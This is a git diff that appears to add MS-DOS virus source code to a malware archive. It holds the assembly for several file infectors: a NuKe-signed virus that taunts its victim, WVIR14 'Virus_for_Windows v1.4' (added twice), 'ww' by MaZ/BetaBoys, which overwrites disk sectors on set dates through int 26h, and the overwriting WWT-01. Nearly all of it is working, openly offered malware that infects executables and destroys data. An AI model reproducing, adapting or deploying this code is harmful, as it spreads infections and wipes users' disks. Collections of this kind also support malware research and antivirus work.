attributes + + dec byte ptr [bp+numinfec] ; One mo infection + jnz mo_infections ; Not enough + pop ax ; remove call from stack + jmp done_infections +mo_infections: jmp find_next + +open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + +attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + +write: + pop bx ; Restore file handle + pop bp ; Restore relativeness + mov ah,40h ; Write to file + lea dx,[bp+decrypt] ; Concatenate virus + mov cx,heap-decrypt ; # bytes to write + int 21h + push bx + push bp +endwrite: + +int24: ; New int 24h (error) handler + mov al,3 ; Fail call + iret ; Return control +data_6 db 9 + db 10h,0D2h,0C4h,0C4h,0BFh, 20h + db 0D6h,0C4h,0C4h,0BFh, 20h,0D6h + db 0C4h,0C4h,0BFh, 20h,0B7h + db 20h ; Data table (indexed access) + db 0D6h,0C4h,0D2h,0C4h,0BFh, 19h + db 03h,0D2h, 20h, 20h,0C2h, 20h + db 0D6h,0C4h,0C4h,0BFh, 20h,0D2h + db 20h, 20h,0C2h, 19h + dd 0DA20D203h ; Data table (indexed access) + db 20h, 20h,0D6h,0C4h,0C4h,0BFh + db 20h,0D6h,0C4h,0C4h,0BFh, 20h + db 0D2h, 20h,0D2h, 20h,0C2h, 20h + db 20h, 18h,0BAh, 20h, 20h,0B3h + db 20h,0BAh, 20h, 20h,0B3h, 20h + db 0BAh, 20h, 20h,0B3h, 20h,0BDh + db 19h, 02h,0BAh, 19h, 05h,0D3h + db 0C4h,0C4h,0B4h, 20h,0BAh, 20h + db 20h,0B3h, 20h,0BAh, 20h, 20h + db 0B3h, 19h, 03h,0C7h,0C4h,0C1h + db 0BFh, 20h,0BAh, 20h, 20h,0B3h + db 20h,0BAh, 20h, 20h,0B3h, 20h + db 0BAh, 20h,0BAh, 20h,0B3h, 20h + db 20h, 18h,0D0h,0C4h,0C4h,0D9h + db 20h,0D3h,0C4h,0C4h,0D9h, 20h + db 0D0h, 20h, 20h,0C1h, 19h, 04h + db 0D0h, 19h, 05h,0D3h,0C4h,0C4h + db 0D9h, 20h,0D3h,0C4h,0C4h,0D9h + db 20h,0D3h,0C4h,0C4h,0D9h, 19h + db 03h,0D0h, 20h, 20h,0C1h, 20h + db 0D0h, 20h, 20h,0C1h, 20h,0D3h + db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h + db 0D0h,0C4h,0D9h, 20h, 20h, 18h + db 19h, 41h, 18h,0D6h,0C4h,0D2h + db 0C4h,0BFh, 20h,0D2h, 20h, 20h + db 0C2h, 20h,0D6h,0C4h,0C4h,0BFh + db 20h,0D6h,0C4h,0D2h,0C4h,0BFh + db 19h, 03h,0D2h,0C4h,0C4h,0BFh + db 20h,0C4h,0D2h,0C4h, 20h,0D2h + db 0C4h,0C4h,0BFh, 20h,0D6h,0C4h + db 0C4h,0BFh, 20h,0D6h,0C4h,0C4h + db 0BFh, 20h,0D2h, 20h, 20h,0C2h + db 19h, 02h,0C4h,0D2h,0C4h, 20h + db 20h,0D6h,0C4h,0BFh, 20h, 20h + db 18h, 20h, 20h,0BAh, 19h, 02h + db 0C7h,0C4h,0C4h,0B4h, 20h,0C7h + db 0C4h,0C4h,0B4h, 19h, 02h,0BAh + db 19h, 05h,0C7h,0C4h,0C4h,0D9h + db 20h, 20h,0BAh, 20h, 20h,0C7h + db 0C4h,0C2h,0D9h, 20h,0C7h,0C4h + db 0C4h,0B4h, 20h,0BAh, 19h, 03h + db 0D3h,0C4h,0C4h,0B4h, 19h, 03h + dd 0D30219BAh ; Data table (indexed access) + db 0C4h,0BFh, 20h, 20h, 18h, 20h + db 20h,0D0h, 19h, 02h,0D0h, 20h + db 20h,0C1h, 20h,0D0h, 20h, 20h + db 0C1h, 19h, 02h,0D0h, 19h, 05h + db 0D0h, 19h, 03h,0C4h,0D0h,0C4h + db 20h,0D0h, 20h,0C1h, 20h, 20h + db 0D0h, 20h, 20h,0C1h, 20h,0D3h + db 0C4h,0C4h,0D9h, 20h,0D3h,0C4h + db 0C4h,0D9h, 19h, 02h,0C4h,0D0h + db 0C4h, 20h,0D3h,0C4h,0C4h,0D9h + db 20h, 20h, 18h, 19h, 41h, 18h + db 19h, 41h, 18h, 19h, 07h, 0Ch + db 1Bh,0C4h,0C4h,0D2h,0C4h,0C4h + db 20h,0D2h, 19h, 06h,0D2h, 19h + db 06h,0D2h, 1Ah, 04h,0C4h,0BFh + db 20h,0D6h, 1Ah, 05h,0C4h, 20h + db 0D6h, 1Ah, 04h,0C4h,0BFh, 20h + db 0D2h, 19h, 0Ah, 18h, 19h, 09h + db 0BAh, 19h, 02h,0BAh, 19h, 06h + db 0BAh, 19h, 06h,0BAh, 19h, 06h + db 0BAh, 19h, 06h,0BAh, 19h, 04h + db 0B3h, 20h,0BAh, 19h, 0Ah, 18h + db 19h, 09h,0BAh, 19h, 02h,0BAh + db 19h, 06h,0BAh, 19h, 06h,0C7h + db 0C4h,0C4h, 19h, 04h,0BAh, 19h + db 02h,0DAh,0C4h,0BFh, 20h,0C7h + db 1Ah, 04h,0C4h,0B4h, 20h,0BAh + db 19h, 0Ah, 18h, 19h, 09h,0BAh + db 19h, 02h,0BAh, 19h, 06h,0BAh + db 19h, 06h,0BAh, 19h, 06h,0BAh + db 19h, 04h,0B3h, 20h,0BAh, 19h + db 04h,0B3h, 20h,0BAh, 19h, 0Ah + db 18h, 19h, 07h,0C4h,0C4h,0D0h + db 0C4h,0C4h, 20h,0D0h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D0h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D3h, 1Ah, 04h + db 0C4h,0D9h, 20h,0D0h, 19h, 04h + db 0C1h, 20h,0D0h, 1Ah, 04h,0C4h + db 0D9h, 19h, 04h, 18h, 19h, 41h + db 18h, 19h, 41h, 18h + db ' ', 9, 1Bh, 'I am afraid that I' + db ' am going to have to smash your ' + db 'WaReZ, d00d!!!' + db 18h, 19h, 41h, 18h, 19h, 41h + db 18h + db 20h + db ' Go ahead! Call the police and t' + db 'ell them ', 0Ah, '[NuKe] ', 9, 'p' + db 'aid you a visit!' + db 18h + +data_1e equ 0A0h +exe_mask db '*.exe',0 +ovr_mask db '*.ovr',0 +com_mask db '*.com',0 +dot_dot db '..',0 +heap: ; Variables not in code +; The following code is the buffer for the write function +code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) +oldint24 dd ? ; Storage for old int 24h handler +backslash db ? +origdir db 64 dup (?) ; Current directory buffer +newDTA db 43 dup (?) ; Temporary DTA +numinfec db ? ; Infections this run +buffer db 1ah dup (?) ; read buffer +endheap: ; End of virus +end entry_point diff --git a/MSDOS/Virus.MSDOS.Unknown.wvir14.asm b/MSDOS/Virus.MSDOS.Unknown.wvir14.asm new file mode 100644 index 00000000..744f5354 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wvir14.asm @@ -0,0 +1,487 @@ + +PAGE 59,132 + +; +; +; WVIR14 +; +; Created: 1-Sep-92 +; Passes: 5 Analysis Options on: none +; +; + +data_11e equ 100h ;* +data_12e equ 140h ;* +data_13e equ 142h ;* +data_14e equ 144h ;* +data_15e equ 148h ;* +data_16e equ 14Ah ;* +data_17e equ 150h ;* +data_18e equ 16Eh ;* +data_19e equ 181h ;* +data_20e equ 19Ch ;* +data_21e equ 19Eh ;* +data_22e equ 1A0h ;* +data_23e equ 1A2h ;* + +;------------------------------------------------------------ seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:stack_seg_b + + db 249 dup (0) + +; +; +; Program Entry Point +; +; + + +wvir14 proc far + +start: + mov ax,cs + add ax,3Bh + mov ds,ax + cld ; Clear direction + push es + push ds + pop es + mov si,data_18e + mov di,data_19e + mov cx,0Dh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,data_17e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov dx,17Bh + xor cx,cx ; Zero register + mov ah,4Eh +loc_1: + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_2 ; Jump if carry Set + mov dx,data_18e + call sub_1 + mov ah,4Fh ; 'O' + jmp short loc_1 +loc_2: + mov dx,data_19e + call sub_2 + pop es + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code + +wvir14 endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + je loc_3 ; Jump if equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_4 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_3: + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +loc_ret_4: + retn +sub_1 endp + + +; +; SUBROUTINE +; + +sub_2 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + jne loc_3 ; Jump if not equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_5 + call sub_6 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + jmp short loc_3 +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + call sub_8 + cmp word ptr [si],5A4Dh + jne loc_5 ; Jump if not equal + cmp word ptr [si+18h],40h + jb loc_5 ; Jump if below + mov ax,[si+3Ch] + mov dx,[si+3Eh] + call sub_16 + mov ds:data_20e,ax + mov ds:data_21e,dx + call sub_8 + cmp word ptr [si],454Eh + jne loc_5 ; Jump if not equal + cmp word ptr [si+0Ch],302h + jne loc_5 ; Jump if not equal + cmp byte ptr [si+32h],4 + jne loc_5 ; Jump if not equal + cmp word ptr [si+36h],802h + jne loc_5 ; Jump if not equal + clc ; Clear carry flag + retn +loc_5: + stc ; Set carry flag + +loc_ret_6: + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + mov ax,[si+16h] + mov dx,140h + call sub_7 + cmp word ptr ds:data_13e,3AEh + jb loc_ret_6 ; Jump if below + cmp byte ptr ds:data_14e,50h ; 'P' + jne loc_ret_6 ; Jump if not equal + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + cmp word ptr ds:data_16e,4A8h + jb loc_ret_6 ; Jump if below + mov ax,ds:data_12e + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + push word ptr ds:[144h] + pop word ptr ds:[1A2h] + and word ptr ds:[144h],0FEFFh + mov ax,[si+16h] + mov dx,140h + call sub_10 + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + push word ptr [si+14h] + pop word ptr ds:[1A0h] + mov word ptr [si+14h],100h + call sub_11 + mov ax,word ptr ds:[140h] + call sub_15 + push ds + push cs + pop ds + mov dx,100h + mov cx,2AEh + nop + call sub_12 + pop ds + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_12 + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + mov ax,ds:data_15e + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_9 + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push word ptr ds:data_23e + pop word ptr ds:data_14e + mov ax,[si+16h] + mov dx,140h + call sub_10 + push word ptr ds:data_22e + pop word ptr [si+14h] + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + call sub_11 + call sub_13 + sub ax,0A8h + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + mov ax,ds:data_15e + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + pop dx + pop ax + sub ax,2AEh + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + mov ax,word ptr ds:[140h] + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + pop dx + pop ax + call sub_16 + mov cx,0 + call sub_12 + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + mov cx,8 + jmp short loc_7 + +; External Entry into Subroutine + +sub_8: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_9: +loc_7: + mov ah,3Fh + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + mov cx,8 + jmp short loc_8 + +; External Entry into Subroutine + +sub_11: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_12: +loc_8: + mov ah,40h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + mov ax,4202h + xor cx,cx ; Zero register + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + add ax,ds:data_20e + adc dx,ds:data_21e + jmp short loc_9 + +; External Entry into Subroutine + +sub_15: + mov cx,10h + mul cx ; dx:ax = reg * ax + add ax,100h + adc dx,0 + jmp short loc_9 + db 33h,0C0h, 99h + +; External Entry into Subroutine + +sub_16: +loc_9: + xchg cx,dx + xchg ax,dx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_14 endp + + ;* No entry point to code + xchg cx,dx + xchg ax,dx + mov ax,4201h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn + db ' Virus_for_Windows v1.4 ' + db 259 dup (0) + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'bbbbbbbbccccccccdddddddddddddddd' + db 'ddddddddddddddddddddddddddd*.EXE' + db 0 + db 'eeeeeeeeeeeee' + db 00h, 00h, 80h, 00h, 00h, 00h + db 5Ch, 00h, 00h, 00h + db 6Ch + db 11 dup (0) + db 4Dh, 4Bh, 39h, 32h + db 8 dup (0) + +seg_a ends + + + +;------------------------------------------------------ stack_seg_b ---- + +stack_seg_b segment word stack 'STACK' + + db 8192 dup (0) + +stack_seg_b ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.wvir14a.asm b/MSDOS/Virus.MSDOS.Unknown.wvir14a.asm new file mode 100644 index 00000000..744f5354 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wvir14a.asm @@ -0,0 +1,487 @@ + +PAGE 59,132 + +; +; +; WVIR14 +; +; Created: 1-Sep-92 +; Passes: 5 Analysis Options on: none +; +; + +data_11e equ 100h ;* +data_12e equ 140h ;* +data_13e equ 142h ;* +data_14e equ 144h ;* +data_15e equ 148h ;* +data_16e equ 14Ah ;* +data_17e equ 150h ;* +data_18e equ 16Eh ;* +data_19e equ 181h ;* +data_20e equ 19Ch ;* +data_21e equ 19Eh ;* +data_22e equ 1A0h ;* +data_23e equ 1A2h ;* + +;------------------------------------------------------------ seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:stack_seg_b + + db 249 dup (0) + +; +; +; Program Entry Point +; +; + + +wvir14 proc far + +start: + mov ax,cs + add ax,3Bh + mov ds,ax + cld ; Clear direction + push es + push ds + pop es + mov si,data_18e + mov di,data_19e + mov cx,0Dh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,data_17e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov dx,17Bh + xor cx,cx ; Zero register + mov ah,4Eh +loc_1: + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_2 ; Jump if carry Set + mov dx,data_18e + call sub_1 + mov ah,4Fh ; 'O' + jmp short loc_1 +loc_2: + mov dx,data_19e + call sub_2 + pop es + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code + +wvir14 endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + je loc_3 ; Jump if equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_4 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_3: + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +loc_ret_4: + retn +sub_1 endp + + +; +; SUBROUTINE +; + +sub_2 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + jne loc_3 ; Jump if not equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_5 + call sub_6 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + jmp short loc_3 +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + call sub_8 + cmp word ptr [si],5A4Dh + jne loc_5 ; Jump if not equal + cmp word ptr [si+18h],40h + jb loc_5 ; Jump if below + mov ax,[si+3Ch] + mov dx,[si+3Eh] + call sub_16 + mov ds:data_20e,ax + mov ds:data_21e,dx + call sub_8 + cmp word ptr [si],454Eh + jne loc_5 ; Jump if not equal + cmp word ptr [si+0Ch],302h + jne loc_5 ; Jump if not equal + cmp byte ptr [si+32h],4 + jne loc_5 ; Jump if not equal + cmp word ptr [si+36h],802h + jne loc_5 ; Jump if not equal + clc ; Clear carry flag + retn +loc_5: + stc ; Set carry flag + +loc_ret_6: + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + mov ax,[si+16h] + mov dx,140h + call sub_7 + cmp word ptr ds:data_13e,3AEh + jb loc_ret_6 ; Jump if below + cmp byte ptr ds:data_14e,50h ; 'P' + jne loc_ret_6 ; Jump if not equal + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + cmp word ptr ds:data_16e,4A8h + jb loc_ret_6 ; Jump if below + mov ax,ds:data_12e + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + push word ptr ds:[144h] + pop word ptr ds:[1A2h] + and word ptr ds:[144h],0FEFFh + mov ax,[si+16h] + mov dx,140h + call sub_10 + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + push word ptr [si+14h] + pop word ptr ds:[1A0h] + mov word ptr [si+14h],100h + call sub_11 + mov ax,word ptr ds:[140h] + call sub_15 + push ds + push cs + pop ds + mov dx,100h + mov cx,2AEh + nop + call sub_12 + pop ds + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_12 + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + mov ax,ds:data_15e + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_9 + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push word ptr ds:data_23e + pop word ptr ds:data_14e + mov ax,[si+16h] + mov dx,140h + call sub_10 + push word ptr ds:data_22e + pop word ptr [si+14h] + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + call sub_11 + call sub_13 + sub ax,0A8h + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + mov ax,ds:data_15e + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + pop dx + pop ax + sub ax,2AEh + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + mov ax,word ptr ds:[140h] + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + pop dx + pop ax + call sub_16 + mov cx,0 + call sub_12 + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + mov cx,8 + jmp short loc_7 + +; External Entry into Subroutine + +sub_8: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_9: +loc_7: + mov ah,3Fh + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + mov cx,8 + jmp short loc_8 + +; External Entry into Subroutine + +sub_11: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_12: +loc_8: + mov ah,40h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + mov ax,4202h + xor cx,cx ; Zero register + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + add ax,ds:data_20e + adc dx,ds:data_21e + jmp short loc_9 + +; External Entry into Subroutine + +sub_15: + mov cx,10h + mul cx ; dx:ax = reg * ax + add ax,100h + adc dx,0 + jmp short loc_9 + db 33h,0C0h, 99h + +; External Entry into Subroutine + +sub_16: +loc_9: + xchg cx,dx + xchg ax,dx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_14 endp + + ;* No entry point to code + xchg cx,dx + xchg ax,dx + mov ax,4201h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn + db ' Virus_for_Windows v1.4 ' + db 259 dup (0) + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'bbbbbbbbccccccccdddddddddddddddd' + db 'ddddddddddddddddddddddddddd*.EXE' + db 0 + db 'eeeeeeeeeeeee' + db 00h, 00h, 80h, 00h, 00h, 00h + db 5Ch, 00h, 00h, 00h + db 6Ch + db 11 dup (0) + db 4Dh, 4Bh, 39h, 32h + db 8 dup (0) + +seg_a ends + + + +;------------------------------------------------------ stack_seg_b ---- + +stack_seg_b segment word stack 'STACK' + + db 8192 dup (0) + +stack_seg_b ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ww.asm b/MSDOS/Virus.MSDOS.Unknown.ww.asm new file mode 100644 index 00000000..333daa65 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ww.asm @@ -0,0 +1,225 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ww proc far + +start: + jmp loc_2 + db 12 dup (90h) + db 0CDh, 20h +loc_2: + jmp short loc_3 + db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 00h, 00h +data_8 db 'C:\Command.Com', 0 + db 'C:\Autoexec.Bat', 0 + db 'C:\Config.Sys', 0 + db '\win' +data_12 dw 6F64h + db 'ws\win.com' + db 00h,0E9h, 0Eh, 00h, 90h,0C8h + db 01h +loc_3: + mov bx,101h + mov ah,[bx] + mov bx,102h + mov al,[bx] + xchg al,ah + add ax,3 + mov si,ax + mov ah,1Ah + lea dx,[si+2C8h] + add dx,6 + int 21h + + mov ah,4Eh + lea dx,[si+103h] + mov cx,6 + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+10Ah] + jmp short loc_6 + db 90h +loc_5: + mov ah,4Dh + int 21h + + mov ah,4Fh + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+2C8h] + add dx,24h +loc_6: + mov ah,3Dh + mov al,2 + int 21h + + mov bx,ax + mov ah,42h + mov al,2 + mov dx,0 + mov cx,0 + int 21h + + + push ax + sub ax,6 + mov dx,ax + mov ah,42h + mov al,0 + mov cx,0 + int 21h + + + mov ah,3Fh + mov cx,1 + lea dx,[si+14Bh] + int 21h + + + mov ah,byte ptr data_8+30h[si] + cmp ah,42h + jne loc_8 + jmp short loc_5 +loc_7: + jmp short loc_9 + db 90h +loc_8: + mov ah,42h + mov al,0 + mov dx,0 + mov cx,0 + int 21h + + + mov ax,3F00h + mov cx,3 + lea dx,[si+2C8h] + add dx,3 + int 21h + + + mov ax,4200h + mov dx,0 + mov cx,0 + int 21h + + + pop ax + sub ax,3 + mov byte ptr data_8+2Eh[si],al + mov byte ptr data_8+2Fh[si],ah + mov ah,40h + mov cx,3 + lea dx,[si+148h] + int 21h + + + mov ax,4202h + mov dx,0 + mov cx,0 + int 21h + + + mov ah,40h + lea dx,[si+100h] + mov cx,data_12[si] + int 21h + + + mov ax,4000h + lea dx,[si+2C8h] + add dx,3 + mov cx,3 + int 21h + + + jmp short loc_9 + db 90h +loc_9: + mov ah,3Eh + int 21h + + mov ah,41h + lea dx,[si+137h] + int 21h + + mov ah,2Ah + int 21h + + + cmp dh,2 + jne loc_14 + cmp dl,17h + je loc_10 + cmp dl,18h + je loc_11 + cmp dl,19h + je loc_12 + jmp short loc_14 + db 90h +loc_10: + mov ah,3Ch + lea dx,[si+119h] + mov cx,1 + int 21h + + jmp short loc_14 + db 90h +loc_11: + mov ah,3Ch + lea dx,[si+129h] + mov cx,1 + int 21h + + jmp short loc_14 + db 90h +loc_12: + mov al,2 +loc_13: + mov cx,96h + mov dx,0 + int 26h + + + + inc al + cmp al,4 + jne loc_13 +loc_14: + mov cx,3 + lea ax,[si+2C8h] + mov si,ax + mov di,100h + rep movsb + call sub_1 + int 20h + +ww endp + +sub_1 proc near + mov di,offset start + jmp di + db 'Why Windows ' +copyright db '(c)1992 MaZ / BetaBoys B.B' + db 90h, 90h, 90h +sub_1 endp + + +seg_a ends + + + + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.wwt-01.asm b/MSDOS/Virus.MSDOS.Unknown.wwt-01.asm new file mode 100644 index 00000000..48817468 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wwt-01.asm @@ -0,0 +1,78 @@ + +PAGE 59,132 + +; +; +; WWT-01 +; +; Created: 15-Mar-91 +; Passes: 5 Analysis Options on: none +; +; + +data_009E_e equ 9Eh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +wwt-01 proc far + +start: + mov dx,offset data_013D + mov ah,4Eh ; 'N' + mov cx,1 + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jnc loc_010E ; Jump if carry=0 + jmp short loc_012C +loc_010E: + mov dx,data_009E_e + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_011A ; Jump if carry=0 + jmp short loc_012C +loc_011A: + mov bx,ax + call sub_012E + mov dx,80h + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_012A ; Jump if carry=0 + jmp short loc_012C +loc_012A: + jmp short loc_010E +loc_012C: + int 20h ; DOS program terminate + +wwt-01 endp + +; +; SUBROUTINE +; + +sub_012E proc near + mov dx,100h + mov ah,40h ; '@' + mov cx,43h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_012E endp + +data_013D db 2Ah + db 2Eh, 43h, 4Fh, 4Dh, 00h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.wwt-02.asm b/MSDOS/Virus.MSDOS.Unknown.wwt-02.asm new file mode 100644 index 00000000..45ee259d --- /dev/null 